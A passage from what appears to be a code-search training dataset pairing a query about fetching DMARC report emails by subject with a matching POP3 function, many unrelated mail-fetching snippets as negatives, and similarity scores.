"def filter_seen_messages(self, messages):\n seen_uids = set()\n for uid in messages:\n key = \"%s_%s_%s\" % (self.opt_pop3_server,\n self.opt_global_account[\"username\"], uid.split()[1])\n if self.helper.get_check_point(key) is not None:\n seen_uids.add(uid)\n new_uids = set(messages) - seen_uids\n self.helper.log_debug(\n 'filter_seen_messages: uids on pop3 %s' %\n set(messages))\n self.helper.log_debug(\n 'filter_seen_messages: uids in checkp %s' %\n seen_uids)\n self.helper.log_debug(\n 'filter_seen_messages: uids new %s' %\n new_uids)\n return new_uids",
"def fetchmail(self):\n mails = []\n\n if self.security == 'SSL/TLS':\n imap = IMAP4_SSL(self.host, self.port)\n else:\n imap = IMAP4(self.host, self.port)\n if self.security == 'STARTTLS':\n imap.starttls()\n imap.login(self.username, self.passwd)\n imap.select(readonly=True)\n\n status, uids = imap.uid('SEARCH', 'UNSEEN')\n\n for uid in uids[0].split():\n status, data = imap.uid('FETCH', uid, '(BODY[HEADER.FIELDS (DATE SUBJECT FROM)])')\n message = self._message_from_data(data)\n mail = Mail(uid, message['FROM'], message['SUBJECT'], message['DATE'])\n mails.append(mail)\n\n imap.close()\n imap.logout()\n\n return mails",
"def getMail():\n\n while 1:\n #if 1==1:\n \n try:\n Mailbox = poplib.POP3(c.Server['host'], c.Server['port']) \n Mailbox.user(c.Server['username']) \n Mailbox.pass_(c.Server['password']) \n numMessages = len(Mailbox.list()[1])\n \n \n log.info(\"Connected to %s and there are %i messages\"%(c.Server['host'], numMessages))\n \n for i in range(numMessages):\n msg = Mailbox.top(i+1, 10000)\n #msg = Mailbox.retr(i+1) # removes messages\n qIncomingMail.put(msg)\n log.debug(\"getMail: put message %i in queue\"%i)\n Mailbox.quit()\n \n except:\n log.error(\"Failed to connect to %s\"%c.Server['host'])\n time.sleep(60)",
"def get_user_messages(user_id):\n pass \n # user_message_list = []\n\n # for message in sent messages:",
"def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers",
"def get_email_ids(conn, query='ALL'):\n if conn.state != \"SELECTED\":\n raise imaplib.IMAP4.error(\"Cannot search without selecting a folder\")\n\n rv, data = conn.uid('search', None, query)\n if rv != 'OK':\n print (\"Could not fetch email ids\") # for some reason...\n return []\n\n return data[0].split()",
"def mailchimp_control():\n print('Starting MailChimp API Call')\n mc_login_info = mailchimp.get_keys()\n mc_data = mailchimp.open_connection(mc_login_info)\n\n mc_lists = mc_data[0]\n mc_emails = mc_data[1]\n\n mc_lists = mailchimp.get_lists(mc_lists)\n emails[:] = mailchimp.get_emails(mc_emails)\n return [mc_lists, mc_emails]",
"def get_public_messages(self):\n messages = []\n for message in self.messages:\n if message.message_id != None:\n messages.append(message)\n return messages",
"def fetch_messages_from_imap(host, port, username, password):\n\n with imaplib.IMAP4(host, port=port) as client:\n client.starttls()\n client.login(username, password)\n client.select(\"INBOX\", readonly=False)\n\n client.create(\"Archives\")\n client.create(\"Archives/Crashreport\")\n\n sorted_reply = client.uid(\"SORT\", \"(DATE)\", \"UTF7\", \"ALL\")\n\n if not sorted_reply[0] == \"OK\":\n raise IMAPClientError()\n\n sorted_messages = sorted_reply[1][0].split()\n\n for msg_uid in sorted_messages:\n reply = client.uid(\"FETCH\", msg_uid, \"(RFC822)\")\n\n if reply[0] != \"OK\":\n raise IMAPClientError()\n\n message = email.message_from_bytes(reply[1][0][1])\n\n yield message\n\n # mark message as read and move to archives\n mark_read_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Seen)\")\n if mark_read_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # moving messages in IMAP unfortunately means copy and delete\n copy_reply = client.uid(\"COPY\", msg_uid, \"Archives/Crashreport\")\n if copy_reply[0] != \"OK\":\n raise IMAPClientError()\n\n delete_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Deleted)\")\n if delete_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # delete the message immediately\n client.expunge()",
"def fetch( self, all=0, seen=None, mark=None ):\n conn = self._v_conn\n indx = self._v_indx\n msgs = []\n\n if seen is None:\n seen = self._v_seen\n if seen is None:\n all = 1\n mark = 0\n\n elif mark is None:\n mark = 1\n\n if indx is None:\n try:\n indx = self._getUids()\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] error getting message index' % ( self._v_login, self.address() ), error=exc_info() )\n raise\n\n #LOG( 'MailServer.fetch', TRACE, 'server has %d message(s)' % len(indx) )\n\n for i, uid in indx:\n if not all and seen.has_key( uid ):\n continue\n\n #LOG( 'MailServer.fetch', TRACE, 'retrieving message %d uid=%s' % (i, uid) )\n\n try:\n res, lines, size = conn.retr( i )\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] cannot retrieve message %d uid=%s' % ( self._v_login, self.address(), i, uid ), \\\n error=exc_info() )\n continue\n\n try:\n msg = self.createMessage( source=join( lines, '\\n') )\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] cannot parse message %d uid=%s' % (self._v_login, self.address(), i, uid), \\\n error=exc_info() )\n continue\n\n msg.uid = uid\n msgs.append( msg )\n\n if mark:\n seen[ uid ] = 1\n\n return msgs",
"def get_new_mails(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\tself.imap.select(\"Inbox\")\n\t\t\tif self.settings.no_remaining == '0' and self.settings.uidnext:\n\t\t\t\tif self.settings.uidnext == self.settings.newuidnext:\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\t#request all messages between last uidnext and new\n\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse, message = self.imap.uid('search', None, \"ALL\")\n\t\t\temail_list = message[0].split()\n\t\telse:\n\t\t\temail_list = self.pop.list()[1]\n\n\t\treturn email_list",
"def filter_unread(check_what, criteria, return_what):\n imap = imaplib.IMAP4_SSL(config[\"email\"][\"server\"])\n imap.login(config[\"email\"][\"user\"], config[\"email\"][\"pass\"])\n status, messages = imap.select(\"INBOX\")\n \n status, response = imap.search(None, '(UNSEEN)')\n unread_msg_nums = response[0].split()\n\n ret = [] \n for i in unread_msg_nums:\n parse_return = parse(imap, i, check_what, criteria, return_what)\n if parse_return is not None:\n ret.append(parse_return)\n set_unseen(imap, i)\n imap.close()\n imap.logout()\n\n return ret",
"def get_messages(self, mailbox):\n\n type = None # Return value\n data = None # Search data\n\n self.items = []\n\n try:\n self.connect(mailbox)\n except Exception as e:\n print(\"Exception: %s\" % e)\n return\n\n type, data = self.connection.uid(\"SEARCH\", None, \"(UNDELETED)\")\n\n if type == \"OK\":\n\n for uid in data[0].split():\n uid = uid.decode(\"ISO-8859-1\")\n msg = self.get_message(uid)\n\n if msg:\n url = self.get_url(msg.decode(\"ISO-8859-1\"))\n\n if url:\n self.items.append(Rss_Item(uid, url))\n else:\n print(\"Could not find URL in message %s\" % uid)\n\n else:\n print(\"Could not parse message %s\" % uid)\n\n\n self.disconnect()\n\n if self.limit:\n del self.items[self.limit:]",
"def main():\n \n ####GET ALL MESSAGES FROM GMAIL###\n # gmail_usr_name = raw_input(\"Enter the gmail user name: \\n\")\n # gmail_passwrd = getpass.getpass(\"Enter the Gmail password: \\n\")\n print(\"Please wait while message IDs for Gmail are populated...\")\n gmail_accumulator = Accumulator.Accumulator(GMAIL_PATH, \"usr_name\", \"passwrd\",\n IMAP_PORT, GMAIL_FOLDER)\n gmail_msg_ids = gmail_accumulator.get_ids()\n pprint.pprint(gmail_msg_ids)\n \n ####GET ALL MESSAGES FROM IMAP###\n #IMAP2_usr_name = raw_input(\"Enter the IMAP2 user name: \\n\")\n #IMAP2_passwrd = getpass.getpass(\"Enter the IMAP2 password: \\n\")\n print(\"Please wait while message IDs for IMAP are populated\")\n \n IMAP2_accumulator = Accumulator.Accumulator(\"imap2.lbl.gov\", \"usr_name\", \"passwrd\",\n IMAP_PORT, IMAP2_FOLDER)\n IMAP2_msg_ids = IMAP2_accumulator.get_ids()\n pprint.pprint(IMAP2_msg_ids)\n \n gmail_unique_ids = gmail_accumulator.get_unique_ids()\n ###FIND THE DIFFERENCES BETWEEN IMAP AND GMAIL.####\n compare_ids = Comparator.Comparator(IMAP2_msg_ids, gmail_unique_ids)\n diff_ids = compare_ids.compare()\n \n ###FIND THE DUPLICATE IDs FROM IMAP2.###\n \n dups = IMAP2_accumulator.get_duplicate_ids()\n dup_headers = header_info(dups, IMAP2_accumulator)\n print(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n print(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n \n print(\"-------------------------------------------------------------------------------------\")\n print(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2}\\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n print(\"--------------------------------------------------------------------------------------\")\n pprint.pprint(diff_ids)\n\n print(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n headers = header_info(diff_ids, IMAP2_accumulator)\n\n ###print a table of the info of the missing messages.###\n table = prettytable.PrettyTable([\"TO\", \"FROM\", \"SUBJECT\"])\n table.align[\"TO\"] = \"l\"\n table.padding_width = 1\n for hdr in headers:\n table.add_row(hdr)\n print(table)\n\n\n ###write the output to OUTPUT_FILE.###\n\n output_file = open(OUTPUT_FILE, 'w')\n output_file.write(\"\\n\")\n output_file.write(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n output_file.write(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n output_file.write(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2} \\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n output_file.write(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n for ids in diff_ids:\n output_file.write(str(ids))\n output_file.write(\"\\n\")\n output_file.write(\"\\n\")\n\n ###OUUTPUT THE TABLE###\n\n output_file.write(str(table)) \n output_file.write(LINE_SEPARATOR)\n\n output_file.close()\n\n ucb.interact()",
"def main():\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('gmail', 'v1', http=http)\r\n\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"]).execute()\r\n messages = []\r\n if 'messages' in response:\r\n messages.extend(response['messages'])\r\n\r\n while 'nextPageToken' in response:\r\n page_token = response['nextPageToken']\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"], pageToken=page_token).execute()\r\n messages.extend(response['messages'])\r\n\r\n i = 0\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n message = service.users().messages().get(userId=USER_ID, id=msg_id).execute()\r\n for prop in message[\"payload\"][\"headers\"]:\r\n if prop[\"name\"] == \"From\":\r\n print(\"ID:\", i, \"\\tFrom:\", prop[\"value\"].encode('ascii','replace'), end=\"\\t\")\r\n elif prop[\"name\"] == \"Subject\":\r\n print(\"Subject:\", prop[\"value\"].encode('ascii','replace'))\r\n i += 1\r\n\r\n to_keep = raw_input(\"Do you want to keep any emails? [N / 0,1,...] \")\r\n if \",\" in to_keep:\r\n to_keep = to_keep.split(\",\")\r\n for i in range(len(to_keep)):\r\n to_keep[i] = int(to_keep[i])\r\n elif to_keep != \"N\":\r\n to_keep = [int(to_keep)]\r\n\r\n if isinstance(to_keep, list):\r\n for i in range(len(to_keep)-1,-1,-1):\r\n msg_labels = {'removeLabelIds': [\"SPAM\"], 'addLabelIds': [\"INBOX\"]}\r\n msg_id = messages[to_keep[i]][\"id\"]\r\n message = service.users().messages().modify(userId=USER_ID, id=msg_id, body=msg_labels).execute()\r\n del messages[to_keep[i]]\r\n\r\n # ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\r\n # filter0 = service.users().settings().filters().get(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # print(filter0)\r\n\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n # for prop in message[\"payload\"][\"headers\"]:\r\n # if prop[\"name\"] == \"From\":\r\n # start_email = prop[\"value\"].find(\"<\")\r\n # end_email = prop[\"value\"].find(\">\", start_email + 1)\r\n # email_address = prop[\"value\"][start_email + 1:end_email]\r\n # filter0[\"criteria\"][\"from\"] = filter0[\"criteria\"][\"from\"] + \" OR \" + email_address\r\n service.users().messages().delete(userId=USER_ID, id=msg_id).execute()\r\n\r\n # service.users().settings().filters().delete(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # service.users().settings().filters().create(userId=USER_ID, body=filter0).execute()\r\n print(\"All Spam Deleted!\")",
"def fetch_all(self):\n emails = []\n res, messages = self._mailconn.search(None, 'ALL')\n if res == 'OK':\n for msg in messages[0].split():\n try:\n res, data = self._mailconn.fetch(msg.decode('utf-8'), '(RFC822)')\n except Exception as error:\n self.close_mail_connection()\n print('No email to read: '+error)\n exit()\n \n msg = email.message_from_string((data[0][1]).decode('utf-8'))\n if not isinstance(msg, str):\n if self.is_sender_in_whitelist(msg['From']):\n emails.append(msg)\n\n return emails",
"def downloadMessages(iinmap4, uids, process_message):\n\ttotal_amount = str(len(uids))\n\tfor i in uids:\n\t\tprint('Fetching message No.' + str(i)+'/' + total_amount + '...')\n\t\tmail = M.fetch(str(i),'(RFC822)')[1][0][1]\n\t\tprocess_message(mail)",
"def load_received_messages(username):\n return [m for m in load_all_messages() if m[\"to\"] == username]",
"def get_all_msgs(self):\n data = self.database.select(self.tname)\n msgs = []\n for item in data:\n msgs.append((item[0], self.data_to_msg(item)))\n return msgs",
"def get_mail_list(self) -> List[int]:\n response = self.IMAP.select(self.mailconfig.folderInbox)\n if response[0] != \"OK\":\n log.error(\"Error accessing Folder '%s': %s\" % (self.mailconfig.folderInbox, response[1][0].decode()))\n emailcount: int = int(response[1][0])\n if not emailcount > 0:\n return []\n log.info(\"%s email(s) in inbox\" % emailcount)\n\n response = self.IMAP.uid(\"search\", None, \"(ALL)\")\n if response[0] != \"OK\":\n log.error(\"Failed to retrieve mails from inbox: %s\" % response[1][0].decode())\n return []\n # TODO: Raise exception?\n indices: List[bytes] = response[1][0].split()\n return [int(x) for x in indices]",
"def get_message_list(self):\n count = 0\n for msg in self.mbox:\n if msg['From'].find(self.config['tgt_email']) > -1:\n dtime = arrow.get(msg['Date'], 'ddd, D MMM YYYY HH:mm:ss ZZ')\n message = dict({'from': msg['From'],\n 'date': dtime,\n 'subject': msg['Subject']})\n # boundary = msg.get_boundary()\n # if boundary is not None:\n # bounds = [m.start() for m\n # in re.finditer(boundary, str(msg))]\n # else:\n # bounds = list()\n # if len(bounds) > 2:\n # message['text'] = str(msg)[bounds[1]:bounds[2]]\n # else:\n # message['text'] = None\n pl = None\n if msg['Subject'].find(\":\") == -1:\n finished = False\n pl = msg.get_payload()\n while finished is False:\n if isinstance(pl, str):\n finished = True\n elif isinstance(pl, list):\n pl = pl[0].get_payload()\n else:\n raise ValueError(\"Non-list, non-str payload?\")\n break\n message['text'] = self.clean_text(str(pl))\n\n if message['text'] is not None:\n self.messages.append(message)\n count += 1\n # print count\n self.messages.sort(key=lambda item: item['date'])",
"def fetch(self, messages, uid):\n return list(zip(range(1, len(self.msgObjs) + 1), self.msgObjs))",
"def get_group_of_emails(M):\n print \"Try to access group of emails\"\n data = search_email_advanced(M)\n if data is None:\n return\n # print \"Got data as \", data\n ids = data[0]\n id_list = ids.split()\n for id_num in id_list:\n rv, data = M.uid('fetch', id_num, \"(RFC822)\")\n if rv != \"OK\":\n print \"Error getting message\"\n return\n # get raw text of the whole email\n raw_email = data[0][1]\n content = email.message_from_string(raw_email)\n # print raw_email\n p = EmailParser()\n # print sender and receivers\n print \"To: \", content['To'], \"\\n\"\n print \"From: \", email.utils.parseaddr(content['From']), \"\\n\"\n print \"Date: \", content['Date'], \"\\n\"\n print \"Subject: \", p.parsestr(raw_email).get('Subject'), \\\n \"\\n\"\n result = parse_content(content)\n # print results\n printData(result)",
"def get_unread_email_ids(gmail_client):\n response = gmail_client.users().messages().list(userId='me',q='is:unread').execute()\n\n if 'messages' in response: # messages key only exists if there are unread messages\n return [message['id'] for message in response['messages']]\n else:\n print(\"No unread messages...\")\n return [] # still return a list since that's what caller expects",
"def get_messages(self):\n\t\tif not self.check_mails():\n\t\t\treturn # nothing to do\n\n\t\tfrappe.db.commit()\n\n\t\ttry:\n\t\t\t# track if errors arised\n\t\t\tself.errors = False\n\t\t\tself.latest_messages = []\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\tuid_validity = self.get_status()\n\t\t\telse:\n\t\t\t\temail_list = self.get_new_mails()\n\n\n\t\t\t# size limits\n\t\t\tself.total_size = 0\n\t\t\tself.max_email_size = cint(frappe.local.conf.get(\"max_email_size\"))\n\t\t\tself.max_total_size = 5 * self.max_email_size\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\t#try:\n\t\t\t\tif self.check_uid_validity(uid_validity):\n\t\t\t\t\temail_list = self.get_new_mails()\n\t\t\t\t\tif email_list:\n\t\t\t\t\t\tself.get_imap_messages(email_list)\n\t\t\t\t\tself.sync_flags()\n\t\t\t\t\tself.get_seen()\n\t\t\t\t\tself.push_deleted()\n\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t\telse:\n\t\t\t\tnum = num_copy = len(email_list)\n\n\t\t\t\t# WARNING: Hard coded max no. of messages to be popped\n\t\t\t\tif num > 20: num = 20 #20\n\n\t\t\t\tfor i, message_meta in enumerate(email_list):\n\t\t\t\t\t# do not pull more than NUM emails\n\t\t\t\t\tif (i+1) > num:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.retrieve_message(message_meta, i+1)\n\t\t\t\t\texcept (TotalSizeExceededError, EmailTimeoutError, LoginLimitExceeded):\n\t\t\t\t\t\tbreak\n\n\t\t\t\t# WARNING: Mark as read - message number 101 onwards from the pop list\n\t\t\t\t# This is to avoid having too many messages entering the system\n\t\t\t\tnum = num_copy\n\t\t\t\tif not cint(self.settings.use_imap):\n\t\t\t\t\tif num > 100 and not self.errors:\n\t\t\t\t\t\tfor m in xrange(101, num+1):\n\t\t\t\t\t\t\tself.pop.dele(m)\n\n\t\texcept Exception, e:\n\t\t\tif self.has_login_limit_exceeded(e):\n\t\t\t\tpass\n\n\t\t\telse:\n\t\t\t\traise\n\n\t\tfinally:\n\t\t\t# no matter the exception, pop should quit if connected\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\tself.imap.logout()\n\t\t\telse:\n\t\t\t\tself.pop.quit()\n\n\t\treturn self.latest_messages",
"def fetch(self, start, stop=None, mbox=None):\n self.select_mailbox(mbox, False)\n if start and stop:\n submessages = self.messages[start - 1:stop]\n mrange = \",\".join(submessages)\n else:\n submessages = [start]\n mrange = start\n headers = \"DATE FROM TO CC SUBJECT\"\n query = (\n \"(FLAGS BODYSTRUCTURE RFC822.SIZE BODY.PEEK[HEADER.FIELDS ({})])\"\n .format(headers)\n )\n data = self._cmd(\"FETCH\", mrange, query)\n result = []\n for uid in submessages:\n msg_data = data[int(uid)]\n msg = email.message_from_string(\n msg_data[\"BODY[HEADER.FIELDS ({})]\".format(headers)]\n )\n msg[\"imapid\"] = uid\n msg[\"size\"] = msg_data[\"RFC822.SIZE\"]\n if r\"\\Seen\" not in msg_data[\"FLAGS\"]:\n msg[\"style\"] = \"unseen\"\n if r\"\\Answered\" in msg_data[\"FLAGS\"]:\n msg[\"answered\"] = True\n if r\"$Forwarded\" in msg_data[\"FLAGS\"]:\n msg[\"forwarded\"] = True\n if r\"\\Flagged\" in msg_data[\"FLAGS\"]:\n msg[\"flagged\"] = True\n bstruct = BodyStructure(msg_data[\"BODYSTRUCTURE\"])\n if bstruct.has_attachments():\n msg[\"attachments\"] = True\n result += [msg]\n return result",
"def list_messages(self):"
] |
[
"0.6295551",
"0.62364864",
"0.62362725",
"0.60055697",
"0.594121",
"0.5897799",
"0.58424914",
"0.5746784",
"0.5717757",
"0.56050134",
"0.55439585",
"0.5524731",
"0.5513999",
"0.54761916",
"0.5467063",
"0.54425406",
"0.54308563",
"0.54162484",
"0.5410898",
"0.5395196",
"0.53838587",
"0.5382463",
"0.538147",
"0.5381258",
"0.53809685",
"0.53723586",
"0.53377116",
"0.5322359",
"0.53056794",
"0.5286006"
] |
0.64419127
|
0
|
Return the full message bodies for the given list of message uids, but only for messages whose subject contains "Report domain:"
|
def get_dmarc_message_bodies(self, messages):
    response = {}
    for uid in messages:
        self.helper.log_debug('get_dmarc_message_bodies: got uid "%s", using uid "%s"' % (uid, uid.split()[0]))
        # POP3 RETR returns the message as a list of byte lines; join them back into one raw RFC822 string
        msg = "\n".join(self.byte2str(self.server.retr(uid.split()[0])[1]))
        msgobj = email.message_from_string(msg)
        # A missing Subject header should simply not match instead of raising on .lower()
        subject = msgobj.get("Subject") or ""
        if "report domain:" in subject.lower():
            self.helper.log_debug(
                'get_dmarc_message_bodies: found dmarc message: uid %s with subject %s' %
                (uid, subject))
            response[uid] = {}
            response[uid][b'RFC822'] = msg
    return response
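
# Editor's sketch (assumption, not part of the original add-on): a standalone
# equivalent showing the poplib pattern the method relies on.  The connection
# handling and the helper name `fetch_dmarc_bodies` are hypothetical.
import email
import poplib

def fetch_dmarc_bodies(server: poplib.POP3, uids):
    """Return {uid: {b'RFC822': raw}} for mails whose subject names a report domain."""
    response = {}
    for uid in uids:
        msg_num = uid.split()[0]                  # UIDL entry "3 000000a1" -> message number "3"
        lines = server.retr(msg_num)[1]           # RETR returns (resp, byte_lines, octets)
        raw = "\n".join(l.decode("utf-8", "replace") for l in lines)
        subject = email.message_from_string(raw).get("Subject") or ""
        if "report domain:" in subject.lower():
            response[uid] = {b"RFC822": raw}
    return response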
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_reports_from_message_bodies(self, response):\n filelist = []\n for uid, data in list(response.items()):\n if self.opt_validate_dkim:\n self.dkim_verify(data.get(b'RFC822',''), uid)\n msg = email.message_from_string(data.get(b'RFC822',''))\n if msg.is_multipart():\n self.helper.log_debug(\n 'save_reports_from_message_bodies: start multipart processing of msg uid %s' %\n uid)\n for part in msg.get_payload():\n ctype = part.get_content_type()\n if self.check_eligible_mimetype(ctype, uid):\n filename = self.write_part_to_file(uid, part)\n filelist.append(filename)\n else:\n self.helper.log_debug(\n 'save_reports_from_message_bodies: start non-multipart processing of msg uid %s' %\n uid)\n ctype = msg.get_content_type()\n if self.check_eligible_mimetype(ctype, uid):\n filename = self.write_part_to_file(uid, msg)\n filelist.append(filename)\n else:\n self.helper.log_debug(\n 'save_reports_from_message_bodies: skipping content-type %s of msg uid %s' %\n (ctype, uid))\n # mark msg as seen in KVstore\n self.save_check_point(uid.split()[1], msg)\n return filelist",
"def recipients(self) -> ty.List[str]:",
"def email_sent_with_subject(subject):\n return [email.subject == subject for email in mail.outbox]",
"def get_message_list(self):\n count = 0\n for msg in self.mbox:\n if msg['From'].find(self.config['tgt_email']) > -1:\n dtime = arrow.get(msg['Date'], 'ddd, D MMM YYYY HH:mm:ss ZZ')\n message = dict({'from': msg['From'],\n 'date': dtime,\n 'subject': msg['Subject']})\n # boundary = msg.get_boundary()\n # if boundary is not None:\n # bounds = [m.start() for m\n # in re.finditer(boundary, str(msg))]\n # else:\n # bounds = list()\n # if len(bounds) > 2:\n # message['text'] = str(msg)[bounds[1]:bounds[2]]\n # else:\n # message['text'] = None\n pl = None\n if msg['Subject'].find(\":\") == -1:\n finished = False\n pl = msg.get_payload()\n while finished is False:\n if isinstance(pl, str):\n finished = True\n elif isinstance(pl, list):\n pl = pl[0].get_payload()\n else:\n raise ValueError(\"Non-list, non-str payload?\")\n break\n message['text'] = self.clean_text(str(pl))\n\n if message['text'] is not None:\n self.messages.append(message)\n count += 1\n # print count\n self.messages.sort(key=lambda item: item['date'])",
"def fetchmail(self):\n mails = []\n\n if self.security == 'SSL/TLS':\n imap = IMAP4_SSL(self.host, self.port)\n else:\n imap = IMAP4(self.host, self.port)\n if self.security == 'STARTTLS':\n imap.starttls()\n imap.login(self.username, self.passwd)\n imap.select(readonly=True)\n\n status, uids = imap.uid('SEARCH', 'UNSEEN')\n\n for uid in uids[0].split():\n status, data = imap.uid('FETCH', uid, '(BODY[HEADER.FIELDS (DATE SUBJECT FROM)])')\n message = self._message_from_data(data)\n mail = Mail(uid, message['FROM'], message['SUBJECT'], message['DATE'])\n mails.append(mail)\n\n imap.close()\n imap.logout()\n\n return mails",
"def filtered_messages(self, msg_type_set):\n ids = {msg_type.get_message_id() for msg_type in msg_type_set}\n\n while True:\n data = self._read_binary_sirf_msg()\n if sirf.bytes_to_message_id(data) in ids:\n yield sirf.from_bytes(data)",
"def _payload_messages(payloads):\n return [\n message for payload in payloads\n for message in payload.sqs_messages\n ]",
"def get_recipients(self, cr, uid, ids, model=None, context=None):\n Statistics = self.pool['mail.mail.statistics']\n res = dict.fromkeys(ids, False)\n for cid in ids:\n domain = [('mass_mailing_campaign_id', '=', cid)]\n if model:\n domain += [('model', '=', model)]\n stat_ids = Statistics.search(cr, uid, domain, context=context)\n res[cid] = set(stat.res_id for stat in Statistics.browse(cr, uid, stat_ids, context=context))\n return res",
"def load_sent_messages(username):\n return [m for m in load_all_messages() if m[\"from\"] == username]",
"def process_mailbox(M):\n rv, data = M.search(None, \"ALL\")\n if rv != 'OK':\n print \"No messages found!\"\n return\n\n ids = data[0]\n id_list = ids.split()\n for num in id_list:\n rv, data = M.fetch(num, '(RFC822)')\n if rv != 'OK':\n print \"ERROR getting message\", num\n return\n\n msg = email.message_from_string(data[0][1])\n decode = email.header.decode_header(msg['Subject'])[0]\n subject = unicode(decode[0])\n print 'Message %s: %s' % (num, subject)\n print 'Raw Date:', msg['Date']\n # Now convert to local date-time\n date_tuple = email.utils.parsedate_tz(msg['Date'])\n if date_tuple:\n local_date = datetime.datetime.fromtimestamp(\n email.utils.mktime_tz(date_tuple))\n print \"Local Date:\", \\\n local_date.strftime(\"%a, %d %b %Y %H:%M:%S\")",
"def fetch(self, start, stop=None, mbox=None):\n self.select_mailbox(mbox, False)\n if start and stop:\n submessages = self.messages[start - 1:stop]\n mrange = \",\".join(submessages)\n else:\n submessages = [start]\n mrange = start\n headers = \"DATE FROM TO CC SUBJECT\"\n query = (\n \"(FLAGS BODYSTRUCTURE RFC822.SIZE BODY.PEEK[HEADER.FIELDS ({})])\"\n .format(headers)\n )\n data = self._cmd(\"FETCH\", mrange, query)\n result = []\n for uid in submessages:\n msg_data = data[int(uid)]\n msg = email.message_from_string(\n msg_data[\"BODY[HEADER.FIELDS ({})]\".format(headers)]\n )\n msg[\"imapid\"] = uid\n msg[\"size\"] = msg_data[\"RFC822.SIZE\"]\n if r\"\\Seen\" not in msg_data[\"FLAGS\"]:\n msg[\"style\"] = \"unseen\"\n if r\"\\Answered\" in msg_data[\"FLAGS\"]:\n msg[\"answered\"] = True\n if r\"$Forwarded\" in msg_data[\"FLAGS\"]:\n msg[\"forwarded\"] = True\n if r\"\\Flagged\" in msg_data[\"FLAGS\"]:\n msg[\"flagged\"] = True\n bstruct = BodyStructure(msg_data[\"BODYSTRUCTURE\"])\n if bstruct.has_attachments():\n msg[\"attachments\"] = True\n result += [msg]\n return result",
"def check_answer(self,msg_list,honeypotids,expect_dict):\n filtered_msgs = []\n for msg in msg_list:\n if \"ALL\" in honeypotids or msg[\"from\"] in honeypotids:\n for k in expect_dict.keys():\n if k in msg.keys():\n if msg[k] == expect_dict[k]:\n filtered_msgs.append(msg)\n return filtered_msgs",
"def get_user_messages(user_id):\n pass \n # user_message_list = []\n\n # for message in sent messages:",
"def recipients_for_conflict(self, conflict):\n recipients = self.default_recipients\n recipients.add(conflict.revision.author)\n filtered_recipients = set([x for x in [y.strip() for y in recipients if y] if x])\n return set([add_email_domain(x, self.domain) for x in filtered_recipients])",
"def fetch_all(self):\n emails = []\n res, messages = self._mailconn.search(None, 'ALL')\n if res == 'OK':\n for msg in messages[0].split():\n try:\n res, data = self._mailconn.fetch(msg.decode('utf-8'), '(RFC822)')\n except Exception as error:\n self.close_mail_connection()\n print('No email to read: '+error)\n exit()\n \n msg = email.message_from_string((data[0][1]).decode('utf-8'))\n if not isinstance(msg, str):\n if self.is_sender_in_whitelist(msg['From']):\n emails.append(msg)\n\n return emails",
"def downloadMessages(iinmap4, uids, process_message):\n\ttotal_amount = str(len(uids))\n\tfor i in uids:\n\t\tprint('Fetching message No.' + str(i)+'/' + total_amount + '...')\n\t\tmail = M.fetch(str(i),'(RFC822)')[1][0][1]\n\t\tprocess_message(mail)",
